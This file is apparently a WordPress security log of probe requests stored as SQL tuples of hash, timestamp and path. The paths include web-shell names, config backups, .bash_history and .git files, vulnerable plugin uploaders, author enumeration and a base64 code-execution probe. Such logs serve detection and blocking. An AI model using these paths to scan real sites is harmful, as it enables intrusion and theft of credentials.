(0xf8c3fd4b60dfc71a0b2bdcb3d13e17c9, 1478751293, '/maill.php'),
(0xff35fbd32b68387d4c5e58df3442f391, 1478751522, '/administrator/includes/readmy.php'),
(0x996d9210a908672194109ece155d00d0, 1478834391, '/wp-config.php~'),
(0xc6168315e62174906cf23334655018e3, 1478853615, '/sites/default/files/up.php'),
(0x4e9faec9f002b7c5517595085b9460a1, 1479048370, '/wp-config.php.bak'),
(0xb78f23b70bda5328ac283cc978ecaecd, 1479078161, '/wp-content/plugins/wp-mobile-detector/'),
(0xdfd51d941489c77548239efafbc507c5, 1479317115, '/xmlrpc-activate.php'),
(0x36cc45715d6e6eda841459f18b1c8c21, 1479406433, '/wp-content/plugins/revslider/settings/?wphp4'),
(0x3046df56565a347fa1feab332a406d0e, 1479406438, '/wp-content/plugins/revslider/settings/?php4'),
(0xfdbe1d47364c3592dca641b44dd38152, 1479406439, '/wp-includes/Text/Tiff.php?php4'),
(0x07bbef7147b80e12de199062e9bb427c, 1479406474, '/wp-includes/Text/Tiff.php?wphp4'),
(0x8d6723459e77908e8b7248e0b27e3906, 1479420080, '/wp-content/themes/wp-conns.php'),
(0x9df310ad8113180710f4221348a1f174, 1479420087, '/wp-content/plugins/wp-conns.php'),
(0x6489f6b479181ad3a8f55b9387c245b8, 1479657557, '/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php'),
(0x0b185f5e7434140d4c85d079fc87b2e7, 1479703979, '/JasperFitch.php?login=cmd'),
(0xd53d6ad53dda3ae957b0d64b5071993e, 1479746494, '/Good-404-Sorry.php'),
(0x3b0f40bc3d9ed2b4600ddfaca58710b3, 1479755326, '/wordpress/wp-login.php'),
(0x74c36da8b264408ba37c4797d3418ef6, 1479757272, '/wp/wp-login.php'),
(0xac0715c83ec7ea2fa656c7c8456eaeb8, 1479763032, '/wp-content/plugins/contact-form-7/login.php?login=cmd'),
(0x2f5fabbf3e552e4bbd193d240a159bba, 1479765610, '/main/wp-login.php'),
(0x0bb2ca1f6c0e2ebe18abf3c63dc4ed46, 1479765614, '/blog/wp-login.php'),
(0x41ed755c6e76f8982513c3a9c4e9c636, 1479767007, '/en/wp-login.php'),
(0xf58a40b18823ebce3857ddbb3134bb44, 1479770175, '/new/wp-login.php'),
(0x81b328f2694d11e0b6e835dbc75b847a, 1479776727, '/home/wp-login.php'),
(0x01f8a91bbced1952346f2673bcda9520, 1479784246, '/cms/wp-login.php'),
(0x3db1e6b84741920a1e985f70297c3955, 1479791898, '/blogs/wp-login.php'),
(0x3619aff575f13f0ca2797ee07b6b0888, 1479795209, '/site/wp-login.php'),
(0x1e5839a12ab22eeef761b7389b4c3476, 1479800210, '/news/wp-login.php'),
(0xc486b9dd495993eb7d66e98bbd00d502, 1479804520, '/wp-admin/includes/images.php?php4'),
(0x08f690b0b76d1d28fd6261add0aa18af, 1479804520, '/wp-admin/includes/images.php?wphp4'),
(0x105470c620a8441142d660daa227a021, 1479806860, '/web/wp-login.php'),
(0xf459d989f3666fcdd23d9423e0d75a54, 1479829546, '/test/wp-login.php'),
(0x8cdf3f07fa8f7843ec1bf97cf0f6bd0a, 1479946325, '/ccontacts'),
(0xf6976b0ecee7af633a01036b8bc3ce0d, 1479990954, '/wp-includes/class-comments.php?blog=comments&title=American%20Power%20and%20Gas%20Reviews'),
(0x81f95a84517d4a6a65191e5c29a19c84, 1480048668, '/_db_backups/setup.php'),
(0x6f658ca94c719851351f9c853f613a40, 1480051550, '/uploadify.php'),
(0x49b35a69165989fae67461de0ce49996, 1480096158, '/wprpc.php'),
(0x09dd5ccdf8413e483bc124e19f13bb8f, 1480268038, '/header.php'),
(0x8cfb789e85c9142f9898acbc03bf7d60, 1480268058, '/functions.php'),
(0x57bcdb022f394b5e117c7c830a806d37, 1480268157, '/general.php'),
(0x50fecc3d0197e0d51eba1836cb18b7e0, 1480268168, '/config.php'),
(0xdf6158b19a9fca5fdc8f81782a2b1d0f, 1480268444, '/system.php'),
(0xb9709a8782ad87971a34ca65b0def0e1, 1480268449, '/dir.php'),
(0x28652e70de996e7f443c29b35d83c8c1, 1480268636, '/title.php'),
(0x3936da11a975f5a8fe7b7e19784e09eb, 1480268836, '/include.php'),
(0xbf6813c2bc0becb369a8d8367b6b77db, 1480268841, '/test.php'),
(0x12ae6f9d1b5fc2cccb5be4cfbc8ec4f5, 1480268864, '/options.php'),
(0x4b539dee918bd974a6acf29c4a2512ec, 1480269027, '/search.php'),
(0x63d41975b36dcd68f3a48b0e73811687, 1480269270, '/xml.php'),
(0xef8800d274f68cd0dcd206c53dd21c9b, 1480269473, '/alias.php'),
(0xb9c58337c29b7523b5e3a2e15a4b32b9, 1480269725, '/option.php'),
(0xaa89293c289e7e159c453fffa9ace76c, 1480269752, '/login.php'),
(0xa84e3a32a66bf3cee6bb017436b487d1, 1480269907, '/page.php'),
(0x13c3181b519f55c8ca9249a6666bd22c, 1480270006, '/ajax.php'),
(0xb4cc8f96e1e20388b11c254710993baa, 1480270016, '/footer.php'),
(0x29580c6493ca39a7271491226ec9fe69, 1480270127, '/list.php'),
(0x0f1c2383d168c790ad8897fcc5621321, 1480270472, '/proxy.php'),
(0x83d26b0a798140d14370abff8a671768, 1480270493, '/object.php'),
(0x9cacdc41584eee6c312b42508a42eea5, 1480271095, '/diff.php'),
(0x15d2c7b2a033980c29d07b0b6613d2f7, 1480271246, '/start.php'),
(0xd8c9fb40a1da079f57e76afb83b93faa, 1480271421, '/utf.php'),
(0x2f973843eef493bac71b92e8218487ff, 1480271567, '/article.php'),
(0xaac58fbc7c675b159dbd88957df7e7b2, 1480271660, '/global.php'),
(0x12a8f47978f4534bebe546b861222767, 1480271881, '/db.php'),
(0x4a1c5930747a4258115a7226cc1dc29e, 1480271897, '/session.php'),
(0x38d5cd7bab40e2bde0976a52e15a18ac, 1480271994, '/user.php'),
(0xc1ca88c3cfeb95739d953c17e58d0e51, 1480272017, '/themes.php'),
(0x64336e03b96eb461d3fe32fad77fa5db, 1480272060, '/template.php'),
(0x5587624e9b779ca4e0d94058289e1bfc, 1480272307, '/inc.php'),
(0x1cf403fc6cd812850fdfc1f392047b10, 1480272646, '/lib.php'),
(0x4286ae48554ea08e822f265aea7a829d, 1480272781, '/blog.php'),
(0x75ff1f43dbc45fd9e997e7cc90a715f5, 1480272924, '/files.php'),
(0xa8c731916fc452f017bea731a895a851, 1480273039, '/gallery.php'),
(0xa418bc921798a0059dcac6c4145cf924, 1480273355, '/menu.php'),
(0x883357c77b7d9539938f814aeb93f14d, 1480273366, '/sql.php'),
(0x768e1841bcd3f05111abad41996fb035, 1480273546, '/file.php'),
(0x0e3835bb030269058bc3667e6751ce42, 1480273660, '/model.php'),
(0x751b46a83f276bdacf136a8e2ee9f345, 1480273718, '/info.php'),
(0x0d37e98b7ed1721ebec9c93da3a5ed05, 1480273812, '/dirs.php'),
(0x66f7d6f15eb6c0f3c7dcad789c17bd26, 1480274041, '/press.php'),
(0x3d97b2d5ee0595ead58748952f8673b7, 1480274246, '/plugin.php'),
(0xcd524ce2155d5a6dab04a3f9ad7dde60, 1480274329, '/ini.php'),
(0x4bb4f86a48d3d592c337555e791b7868, 1480274381, '/dump.php'),
(0x75a0028bb6377f925af5b881108a4592, 1480274929, '/error.php'),
(0xe59095d3329e54edb8d1ddf4050d6093, 1480274975, '/view.php'),
(0x1d8b957e17bb2c834f1bd12ecf015ac3, 1480274982, '/javascript.php'),
(0xed4b0882e334898da97de388b4b473c1, 1480275045, '/help.php'),
(0xb6b3ddd5d79bff38f6be1d6289b7ad15, 1480275619, '/defines.php'),
(0xbfda4cd463a2553bc6ab4fcb6697f505, 1480275630, '/code.php'),
(0x48ccffb7541decb5a3584c2136ba19de, 1480275958, '/css.php'),
(0x44847813b760100c68a23f30b0dbddd6, 1480350877, '/wp-content/uploads/2016/08/config.php'),
(0x719af452122c79404742a6071c4d59a5, 1480350877, '/wp-content/uploads/2016/10/config.php'),
(0x3b2472ff596c83477bd639cd6d5e721c, 1480350877, '/wp-content/uploads/2016/06/config.php'),
(0xb158303c3237dcce16c8e5ca8824e826, 1480350877, '/wp-content/uploads/2016/05/config.php'),
(0x87daf775fd5d187976ba826cb51c344a, 1480350877, '/wp-content/uploads/2016/02/config.php'),
(0x70e77d8f5675c2a9334056235fd1de31, 1480350877, '/wp-content/uploads/2016/09/config.php'),
(0x56a5584a50edf3ba4f67bd7c26008671, 1480350877, '/wp-content/uploads/2016/07/config.php'),
(0x20bb7e817e4def598283133cc5def6fb, 1480350877, '/wp-content/uploads/2016/03/config.php'),
(0xc09d5ec1ea4446c4ce208f6117e4bdbf, 1480350877, '/wp-content/uploads/2016/04/config.php'),
(0xea718e8296fa4c6ceead5bb5940d0bda, 1480350878, '/wp-content/uploads/2016/01/config.php'),
(0xc104897ee82c900ec57055409a029ea1, 1480350878, '/wp-content/uploads/2016/11/config.php'),
(0x64e8f950c2ce288a10c269f4175985f4, 1480376207, '/ajax-requests.new.php'),
(0x311ab7be2a9aeaa484f254c6a3951050, 1480450650, '/wp-includes/js/tinymce/plugins/textcolor/ajax-requests.new.php'),
(0xee36650a1a0cfd16d8a2fba0173902d8, 1480475954, '/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php'),
(0xa145406e2912b2df6cade5e76b83bf99, 1480532066, '/wp-smtp.php?c'),
(0xbca75779f6ded1650d3bf2c079f5520e, 1480589752, '/wp-content/themes/photocrati-theme/style.css'),
(0xd913a2a40c9e66ecc6145ef7d7c9bcf0, 1480609826, '/wp-smtp.php?up'),
(0xf35e8030845635e31abd5257942300bb, 1480634056, '/feed/magpie_debug.php'),
(0x91fa8057819ff2f1db29b1e4183de09b, 1480647144, '/wp-content/plugins/hb-audio-gallery-lite/readme.txt'),
(0x269631c794864c50b98363f67f98d73d, 1480647149, '/wp-content/plugins/memphis-documents-library/readme.txt'),
(0x5d877d24f46164e04ebb82ef89b1fa7e, 1480717235, '/wp-content/themes/photocrati_/style.css'),
(0x6195f59d95b7264622ba9453ec002bfd, 1480739466, '/error-logs.php'),
(0x064990a45872f5a76f2d95a1e5b6882a, 1480739847, '/sfn.php'),
(0x42b583c66a41666928987b2b7ca85e3b, 1480739945, '/cod.php'),
(0x1d663839ab05d3a207af3263f25168de, 1480759106, '/11.php'),
(0x31606b22a671b84630f70afc2a0990a5, 1480759422, '/wp-includes/class-comments.php?blog=1'),
(0x39074969aa16a9888a2b5136a179cdd6, 1480759618, '/wp-content/plugins/sfn.php'),
(0xd78a12b2d80de778bc6efeff482ae2da, 1480759810, '/wp-content/plugins/Materialnlns.php'),
(0x9159ee617446fca051c0cc9d498791be, 1480773815, '/vmskdl44rededd'),
(0x41fa16c63c7b77c757d92a214ad0d9e8, 1480773817, '/N0Wccvvd333.php'),
(0x1f4be918116ffc9b3c7117e19082bf8f, 1480773819, '/N0WaY/N0WaY1bb2/N0WaY123.php'),
(0x7453a23d0e81e073f91ee55c6a73d1bb, 1480773863, '/?author=11'),
(0x28187e9d15f0e4319ef41be9fe187c8f, 1480773865, '/?author=12'),
(0x1e97448de343cfc7af187cb7a59cdc3b, 1480773866, '/?author=13'),
(0x968a3eeb05f54774f02814e59fea774a, 1480773868, '/?author=14'),
(0xcb54b9cfec4c235db326d4218a730070, 1480773869, '/?author=15'),
(0x06e897b69e7a7c7fc2dcb1a28c826070, 1480773871, '/?author=16'),
(0xc25636af628cb6026e05eabdf4a56051, 1480773873, '/?author=17'),
(0x3f1860a99b2d0cb7892c0d1b94719002, 1480773874, '/?author=18'),
(0x996f8c6d1aa7a7a3f72511e410721d9a, 1480773875, '/?author=19'),
(0x76cc0bd6e9a6f9044bd5b6785ba4e78f, 1480773876, '/?author=20'),
(0xa0988256097fc79dbda3f60762564ed0, 1480773877, '/?author=21'),
(0x7334ef3237e5a26e6c9dc56756219f4b, 1480773878, '/?author=22'),
(0x8940d57319c2525dbe3d37a091eaf877, 1480773879, '/?author=23'),
(0x1d832bdb528c3bedb28baba74a77741e, 1480773880, '/?author=24'),
(0x12e0afe6918f1591c0b36ce2174c9ef9, 1480773881, '/?author=25'),
(0x5dabe41f7a3358d9d624a85d321ec042, 1480773882, '/?author=26'),
(0xdc28ea33de5f68477ba23586cc5fb437, 1480773883, '/?author=27'),
(0x20aa7d2d3c6d569f321cff32dd4aafee, 1480773884, '/?author=28'),
(0x8a5f5559f6299a94389269fa6d9a6a01, 1480773885, '/?author=29'),
(0xfe7fffb6b89447210a72cb3759fcf1e0, 1480773885, '/.nksdjs'),
(0x4d1950ddc556f05178173c92368e8893, 1480773886, '/.bash_profile'),
(0x0a2fea3de13fc866be03d9a7b3c8ca42, 1480773887, '/.bash_history'),
(0x94d8c65d46e9e47c045a8860a9098603, 1480773888, '/.bashrc'),
(0xa4acabc54edf179b0f68d27e6abc471d, 1480773889, '/.db_config'),
(0x663d83a4afdafe58f3b7a2c1f8b40607, 1480773890, '/.default'),
(0x5b45af00f738a66c2eb16a6d0a4d177e, 1480773891, '/.logs'),
(0x3bc96a0135c9b76ae5ecf07409fd7752, 1480773892, '/.old'),
(0xbced465ae33ce0d38506e517b91a301b, 1480773893, '/.private'),
(0x2996f1ae5349569cf506b5a6d488d0b6, 1480773894, '/.queries'),
(0x722220dc042e17eaf3e2264741c52309, 1480773895, '/.query'),
(0x8e01d69175cc3bc06ee846c0f724c07d, 1480773896, '/.secret'),
(0x9da7f543764a823a76a19decba0c0274, 1480773897, '/.sql'),
(0x73f3c0d8bc48271ed302deeff128454e, 1480773898, '/.temp'),
(0xf3300ddd47599fec2ffc672e151e6847, 1480773899, '/.git/HEAD'),
(0x98413616be76ca2adb60d2de52405fde, 1480773900, '/phpinfo.php'),
(0xc0f0357c3effc3e9b604afd9bc4c58e3, 1480773901, '/pinfo.php'),
(0x29ca779b93912379bd997ae3005837b9, 1480791486, '/wp-content/upgrade/theme-compat/popup-pomo.php'),
(0x46024fd5b6b72b3b0564665abc42de1c, 1480848054, '/wp-content/themes/photocrati-theme-v4/style.css'),
(0x03a4c240d7e9ee2b7231c8928255a0ee, 1480848054, '/wp-content/themes/photocrati-theme-v4.071/style.css'),
(0xca11c4c94bdadb827ff14ddd2842a03e, 1481078342, '/wp-content/themes/photocrati_/admin/README.txt'),
(0x00c40461503b46fcb89c7cd9b68a4690, 1481197264, '/wp-content/themes/photocrati-theme-v4.071/admin/README.txt'),
(0x05ed8fec7dbd3f4b456035af2e55761a, 1481216365, '/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css'),
(0x19aaf7def10fed4bf772cadcb039ef6c, 1481335095, '/wp-content/themes/photocrati-theme-v4/admin/README.txt'),
(0x14c7e2bcb6f1ef85bc4376dbd69a9633, 1481336049, '/wp-includes/css/modules.php'),
(0xd7f0599dafd1dca1eb9aecd3613f6d00, 1481383893, '/wp-content/plugins/text-hover/text-hovers.php'),
(0xd87841b7dd026619a18ca41e1abfe8d8, 1481523883, '/wp-content/plugins/delete-all-comments/readme.txt'),
(0x5bf10b4cae79b7839135e7fb8cb545f6, 1481560083, '/popup-pomo.php'),
(0x18d0c6f4797c8ebdda328d24935e98e3, 1481596845, '/wp-content/themes/WPLocalPlaces/style.css'),
(0xc828380fd593e4f319ea4fc1ff833a55, 1481715425, '/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css'),
(0x35b26f3c6d85d1137cefc87788b8ef8a, 1481749282, '/pxdruahv'),
(0xa56753b7ccd4ae86969b9b1b24367215, 1481888412, '/wp-import.php'),
(0x1208679ab48992c76a89a9eae9f32d19, 1481969225, '//wp-content/plugins/woocommerce-product-options/includes/image-upload.php'),
(0x03633ae466629237785ea88e6381d443, 1481991374, '/wp-content/uploads/files/guest/wp-cache.php'),
(0xc1156122e1417449de964e216749fb71, 1481991375, '/wp-content/uploads/2016/12/wp-cache.php'),
(0xb395cb4d0d400ba47b9635ac71c150ce, 1481991376, '//modules/mod_simplefileuploadv1.3/elements/udd.php'),
(0x0bf0516ce5cc12c25f0fe354332fb9e0, 1481991377, '/modules/mod_simplefileuploadv1.3/elements/wp-cache.php'),
(0x054514f6853a100a8671c5050456936b, 1482110498, '/up.php'),
(0xd1a78c254881154cf35c24db2b25de35, 1482365457, '//wp-content/plugins/delete-all-comments/delete-all-comments.php'),
(0x9e0725f2794499fd44e071c2501ac00a, 1482376571, '/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php'),
(0x48d853f626b4e8fd2b291a79e4e7d2b8, 1482516189, '/update.php'),
(0x7a1dbc371194af7e120346167c6e91c0, 1482542096, '/cms/uploadify/uploadify.swf'),
(0x5c90d3b44885626a6a60dddf11bf63d6, 1482542096, '/uploadify/uploadify.swf'),
(0x18e6c295d6ccceb9805955e7113670bd, 1482542096, '/admin/uploadify/uploadify.swf'),
(0xef9e7e7c527d59fdf238114415e2b0e0, 1482542096, '/lib/uploadify/uploadify.swf'),
(0xef14bc7bf1a71959d6c84d6ef2b87b12, 1482542096, '/includes/uploadify/uploadify.swf'),
(0xb49f82ba620a57058045b82de78b22b9, 1482542096, '/inc/uploadify/uploadify.swf'),
(0xee2b79819a90edd89e395ec5f2aaafd2, 1482542096, '/plugins/uploadify/uploadify.swf'),
(0x0fdd42491511951af63a516fc5bcb49d, 1482542096, '/js/uploadify/uploadify.swf'),
(0xff48c6c25956ef176e172b80c055d1a1, 1482609522, '/upload.php'),
(0x9c53c53cc4c2b65c02043dfbb639672f, 1482638400, '/wp-content/plugins/contus-video-galleryversion-10/upload1.php'),
(0xed118b880552d13be989ffe06b7dc8ee, 1482649592, '/404error.php'),
(0x6a70ee533add1ec03b016fbe868079d6, 1482768690, '/Configss.php?check'),
(0x127bc0bf8eeef2b26195bc6fbb45ebd6, 1482778971, '/wp-content/themes/figero/scripts/doajaxfileupload.php'),
(0x0e82e79bc114d5009ce28370cf3f7cf9, 1482804510, '/wp-content/plugins/wpshop/includes/ajax.php'),
(0x58319501b87036780f838f4ea52fb806, 1482806399, '/wp-content/themes/wumblr/themify/js/utils.js'),
(0xd5d50af7c5cc01e43924b6877caeb48c, 1482875931, '/wp-content/plugins/front-end-upload/lib/plupload/examples/upload.php'),
(0xf53d0f7604814535df2be333777ab7d4, 1482884629, '/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php'),
(0x074c0483eb829476e0129adf8b9fc9dd, 1482901667, '/wp-content/plugins/formcraft/file-upload/server/php/index.php'),
(0xeb50cfd631633c31240442f63534cfd5, 1482924756, '/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php'),
(0x9d375354fa7cd4dee6b125e68423a96c, 1482925479, '/wp-content/themes/bloggie/themify/js/utils.js'),
(0x4751b2828c75871aed8a625fef1e3e68, 1482937151, '/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php'),
(0xeaf1abc6369c6022286ec72dc396e195, 1482959712, '/wp-content/plugins/wp-post-frontend/js/plupload-2.1.2/examples/upload.php'),
(0x66a2e7c12fd0b52de70ca69b99a49c69, 1482967607, '/libraries/wp-conns.php'),
(0xba151fac1e227f3cb92fae7692eb73cd, 1482967706, '/components/wp-conns.php'),
(0x5ff4fae303d841704cfe34b13873dd8c, 1482967728, '/modules/wp-conns.php'),
(0x191b5c3b94bcab2ab54da09f85a18a5d, 1482967757, '/wp-conns.php'),
(0x54e87310886c648bb6ae7230d73f1737, 1482968178, '/templates/wp-conns.php'),
(0x3f9fee3cee419410d7ee955f5db4dd7c, 1482968318, '/administrator/wp-conns.php'),
(0xc7011b86e6cb52685bb7e31cf331da98, 1482968507, '/plugins/wp-conns.php'),
(0x0b280651d1b213abc5fe237870d0c8dc, 1482968549, '/wp-admin/wp-conns.php'),
(0xaff3ab4c90e9fd7691939f33ed438a2a, 1482968750, '/wp-includes/wp-conns.php'),
(0xb1601881c24bf6976d65b89661e01875, 1482968816, '/wp-content/wp-conns.php'),
(0x7df2cef39018f8161c495af12c050701, 1482969148, '/wp-content/uploads/wp-conns.php'),
(0x2518f465b621f1b2e4221c142ac2a1c1, 1482973289, '/wp-content/common.php'),
(0xfd56b5a492976502cbcd60b5329f34d0, 1482973444, '/wp-snapshots/tmp/mssqli.php'),
(0xbd5c24b7aedc5400a4d6c18421a3aae2, 1482973502, '/wp-content/themes/twentytwelve/inc/mssqli.php'),
(0xcf5a6a039e422f80ef26a4dfe9a21259, 1482973564, '/wp-content/main_.php'),
(0xc82f364fc58b4fee472ab04e26d1ae26, 1482973613, '/wp-content/plugins/hello-dolly/mssqli.php'),
(0xa585695b8f190875691950fd9f68f915, 1482973731, '/wp-includes/css/mssqli.php'),
(0xea7709692ca28750935d616c5300821b, 1482973833, '/common.php'),
(0xfc6e909dcd5cd3e7995688fbc4ca1ba0, 1482974034, '/wp-content/wfcache/phoenixtechsolution.com_portfolio-3/mssqli.php'),
(0x7e289b76cc74b867589bbe08a71ad6d6, 1482974035, '/wp-content/fmp-jw-files/configs/mssqli.php'),
(0x87f760bc6ba663bc344e7933de542423, 1482974309, '/wp-includes/theme-compat/mssqli.php'),
(0x1e1629cc27a000c8df3afd13c05d83fd, 1482974693, '/wp-content/uploads/2013/07/mssqli.php'),
(0x227b8a3460062a69f4d00e01bd627ade, 1482974932, '/wp-content/uploads/quarantine/mssqli.php'),
(0x4f55b636cd71df5b244ccdcab5f2c71a, 1482975140, '/wp-content/plugins/maintenance-mode/languages/mssqli.php'),
(0xd67c327a24a16f3d18020936614084e4, 1482975522, '/monte.php'),
(0x89c062d889bae521e518a5ff1f96e846, 1482975704, '/wp-admin/maint/mssqli.php'),
(0xecd34e2ad15016d00b022714ce4b082e, 1482976173, '/wp-content/monte.php'),
(0xf3e4ce047fef312e57694e4cbccbcdaf, 1482976553, '/wp-content/uploads/mssqli.php'),
(0x95540cd3356df38bb47b33b2f347d159, 1482976846, '/wp-includes/fonts/mssqli.php'),
(0x29e5e58023b4c35877c01a12910b5679, 1482976999, '/wp-content/uploads/sucuri/mssqli.php'),
(0x81bd75a7168a80ec5f6417414aedae5b, 1482977629, '/wp-includes/theme-compat/productid/mssqli.php'),
(0xd871307186cf10094f96f257579967ff, 1482979055, '/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xaa7cc785b35f05fb1d478824f1275af3, 1482979139, '/wp-content/plugins/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x696cfe068732732ed4f9567417e600b9, 1482979279, '/wp-content/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x418ec2a212cf1e2e8c101bfe10ba3c1b, 1482979305, '/modules/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x42822feb305061c124ec4c35742bd49a, 1482979479, '/libraries/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x1ca0f3155e23973bfa171c3f1d8ca404, 1482979494, '/wp-admin/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x075060b57dafffe5927cf56a503590c1, 1482979572, '/plugins/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x355b5209cdc1bba9368f5ada7e312115, 1482979644, '/wp-includes/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xc5baa2e5a1062e158056e54329848630, 1482979765, '/templates/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x3a89412f1b61adb12c44c85a7e105654, 1482979995, '/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php'),
(0x84ecb7a809244678e586f1c6a504d5ac, 1482980051, '/wp-content/plugins/levelfourstorefront/products/wp-classes.php'),
(0xd1d243e8b00ad3d5df2d6e6cb7cccd27, 1482981003, '/administrator/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xd570f0ac0b2c73a47ad17e576f72b94f, 1482981008, '/wp-content/uploads/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x7c3dae7069e9188ffdf9444f77af4df7, 1482981068, '/components/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xa1c8cb2c94dbaf884e2aee26c2ad7c8d, 1482981109, '/wp-content/themes/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x4e58898da63b5d54cb769d48e9d81c6d, 1482986208, '/wp-content/plugins/use-your-drive/includes/jquery-file-upload/server/php/index.php'),
(0x063d5af7b48e9036129600dec399f3c8, 1482994826, '/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php'),
(0xe380ea99880dd923ed63e10be861d49b, 1483022188, '/wp-content/plugins/ubh/up.php'),
(0x596ae36163b8932a895266f27dafb531, 1483038078, '/wp-content/plugins/ultimate-product-catalogue/product-sheets/wp-classes.php'),
(0x1c063928a520b5ac060acbb033a60df6, 1483059289, '/wp-content/plugins/malapascua-agency/js/plupload/examples/upload.php'),
(0xcfa49ab5028d5c7cf0cf051c41898395, 1483068630, '/license.php.suspected'),
(0x7b1e22f4f98c59b599a4304d9985faf6, 1483075285, '/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'),
(0x560f9ff6d865718867bf0591b67df964, 1483095056, '/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2016&Month=02'),
(0x2740024c93c65442f998e9733412c74d, 1483116037, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/upload.php'),
(0x21ac36a093c645585f4c70e03e0c677b, 1483116122, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/wp-classes.php'),
(0xf62f65a7c576ed72015c57a2013dbd5c, 1483269272, '/wp-content/plugins/downloads-manager/page-download-template.tpl'),
(0x7a7da57bc0832a2542f28d58fee18f63, 1483461298, '/wp-admin/include.php'),
(0x5047d9990bb2a7a804f059a9857c2ff6, 1483461311, '/wp-includes/dir.php'),
(0x3211836ae2d14d759e34181dd0607ff7, 1483461330, '/wp-includes/diff.php'),
(0xc453809ccd1695bcbed899dca1b121f4, 1483461433, '/wp-admin/page.php'),
(0x6273d364eea9d52db12aeed65ef110c1, 1483461461, '/wp-content/diff.php'),
(0x5568ff458fdfdde5764f25806908d0d0, 1483461643, '/wp-includes/ajax.php'),
(0xd0bcafd867762338ec2c3b98a285491c, 1483461683, '/wp-admin/proxy.php'),
(0x57b0496c70a6c864a0bdee2655ebbeba, 1483461708, '/wp-content/utf.php'),
(0x98fdfcdd5cf7415c63dd1d91c2745c6b, 1483461732, '/wp-admin/dir.php'),
(0xc8a13bfd0493aaf82174f1bf3ca9cab4, 1483461755, '/wp-content/dirs.php'),
(0x0c82b3175b38af6b84305b01cc0b3729, 1483461814, '/wp-content/template.php'),
(0x821e606fbdc744779bb03814c1b1f21a, 1483461852, '/wp-includes/object.php'),
(0x9240aeabe2d986ac9599c6a58b03e6e2, 1483461885, '/wp-admin/file.php'),
(0x0cba28051812cd24507fce5c35aee310, 1483462040, '/wp-content/include.php'),
(0xf34a4852dcc9ef01cdec3ab050f8e1a2, 1483462058, '/wp-admin/alias.php'),
(0xbc8c9f1f475c4084e591d59db4c47b5d, 1483462069, '/wp-admin/cache.php'),
(0x9e589da05be2a91468ff114914a706eb, 1483462287, '/wp-content/cache.php'),
(0xe3d344a6828a2867fd1722d56ce74f61, 1483462295, '/wp-includes/test.php'),
(0xf5694f113d155c595505dd31a1cea00f, 1483462319, '/wp-content/page.php'),
(0xe3d25cf4900ee419e5a5d81d90388c52, 1483462470, '/wp-content/ajax.php'),
(0x0569e316e0c1be4b666206f1e4f32f73, 1483462500, '/wp-content/sql.php'),
(0xd19de701d8ff4b02d4f407cb6cec44a0, 1483462542, '/wp-content/user.php'),
(0xa1424ad14ecc13422323ec900b67e977, 1483462554, '/wp-content/css.php'),
(0x6b7f2d32e034e8cc6ae6eab5f96d9636, 1483462559, '/wp-includes/header.php'),
(0x11dff30474ba4c5a5e3e6f8e467b7bc7, 1483462564, '/wp-admin/object.php'),
(0x74ef6ba5c94c117d115385bf726ac655, 1483462763, '/wp-content/general.php'),
(0x2de6e6d13fd5020141856ea9d0d07932, 1483462806, '/wp-content/error.php'),
(0xfb2affc9f88252a601c28a325d8e466d, 1483462830, '/wp-admin/css.php'),
(0xcbb1f3ab185a23525b5130919358224b, 1483462856, '/wp-admin/config.php'),
(0xb233f42f26f897c31bfc9e0e1106d31e, 1483462857, '/wp-admin/start.php'),
(0x09b48d626c0ab186d3b741f60f24dbd6, 1483462870, '/wp-includes/session.php'),
(0x4d18a78955a4e6174029cf5ddb09e905, 1483462902, '/wp-admin/ajax.php'),
(0x259e3b3fad7bbb11f2b8408b826b99e6, 1483462902, '/wp-includes/sql.php'),
(0xe112ecd8e2ea3835590955acbc9c3f52, 1483463048, '/wp-includes/search.php'),
